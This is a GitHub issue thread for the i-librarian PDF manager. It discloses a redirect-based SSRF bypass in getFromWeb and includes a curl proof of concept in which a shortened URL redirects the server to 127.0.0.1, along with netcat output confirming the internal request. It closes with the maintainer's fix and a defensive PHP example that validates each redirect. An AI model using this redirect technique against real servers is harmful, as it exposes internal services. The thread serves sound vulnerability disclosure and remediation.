mkucej / i-librarian

Legacy I, Librarian - collaborative PDF manager. Not maintained, new version is at https://github.com/mkucej/i-librarian-free
https://i-librarian.net

Another SSRF Vulnerability in getFromWeb #122

Closed xiaoyinl closed 6 years ago

xiaoyinl commented 6 years ago

There is another SSRF vulnerability in the function getFromWeb other than the one mentioned in #120: the server side request follows redirection, and doesn't validate the destination URL: https://github.com/mkucej/i-librarian/blob/9535753a84bc615b210802d4c9542db73368d984/functions.php#L834

So attacker can bypass the URL check by setting form_new_file_link to a URL that redirects to an internal IP,

PoC:

```
curl --request POST 'http://127.0.0.1/librarian/ajaxsupplement.php' --cookie 'PHPSESSID=0031ae12enlb3taa41vojindt4' --data 'form_new_file_link=https://tinyurl.com/y9waetyo&filename=serverdata.pdf'
```

(The tinyURL redirects to http://127.0.0.1:1111/test.html.)

Result:

```
$ nc -l 1111
GET /test.html HTTP/1.1
Host: 127.0.0.1:1111
User-Agent: curl/7.47.0
Accept: */*
Referer: https://tinyurl.com/y9waetyo
```

mkucej commented 6 years ago

Thank you for reporting this. Pasting links functionality will be quite limited without FOLLOWLOCATION.

mkucej commented 6 years ago

I guess we could redirect manually and check each redirect for a safe URL.

mkucej commented 6 years ago

fixed in 4.9
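The manual-redirect approach discussed above, as an added example that is not the project's own code: `CURLOPT_FOLLOWLOCATION` stays off, each hop's host is resolved and checked against loopback, private and reserved ranges before it is fetched, and the checked IP is pinned with `CURLOPT_RESOLVE` so the connection cannot go to a different address than the one validated. Function names and the hop limit are assumptions; it requires the PHP curl extension.

```php
<?php
// Added example (not i-librarian code): validate every redirect hop before fetching it.

function url_is_safe(string $url, ?string &$pinned_ip = null): bool
{
    $p = parse_url($url);
    if ($p === false || empty($p['host']) || !in_array($p['scheme'] ?? '', ['http', 'https'], true)) {
        return false; // only http/https, and the URL must name a host
    }
    // A literal IP is checked as-is; a hostname is resolved once (IPv4 only via gethostbyname).
    $ip = filter_var($p['host'], FILTER_VALIDATE_IP) ? $p['host'] : gethostbyname($p['host']);
    // gethostbyname() returns the unchanged name on failure, which then fails the IP filter.
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        return false; // 127/8, 10/8, 172.16/12, 192.168/16, 169.254/16, 0/8 etc. are rejected
    }
    $pinned_ip = $ip;
    return true;
}

// Returns the final response body, or null if any hop is unsafe, fails, or the hop limit is hit.
function fetch_with_safe_redirects(string $url, int $max_hops = 5): ?string
{
    for ($hop = 0; $hop <= $max_hops; $hop++) {
        if (!url_is_safe($url, $ip)) {
            return null; // the hop (initial URL or a redirect target) points somewhere internal
        }
        $p    = parse_url($url);
        $port = $p['port'] ?? ($p['scheme'] === 'https' ? 443 : 80);
        $ch   = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => false,                       // never let libcurl redirect on its own
            CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_RESOLVE        => ["{$p['host']}:{$port}:{$ip}"], // connect to the IP we just checked
            CURLOPT_TIMEOUT        => 15,
        ]);
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
        $next = curl_getinfo($ch, CURLINFO_REDIRECT_URL);          // Location target, "" if none
        curl_close($ch);
        if ($body === false) {
            return null;
        }
        if ($code >= 300 && $code < 400 && $next !== '') {
            $url = $next; // loop back: the target is validated at the top before being fetched
            continue;
        }
        return $body;
    }
    return null; // too many redirects
}
```

Pinning with `CURLOPT_RESOLVE` matters because a name that resolves to a public address when checked and to 127.0.0.1 when libcurl connects (DNS rebinding) would otherwise defeat the check.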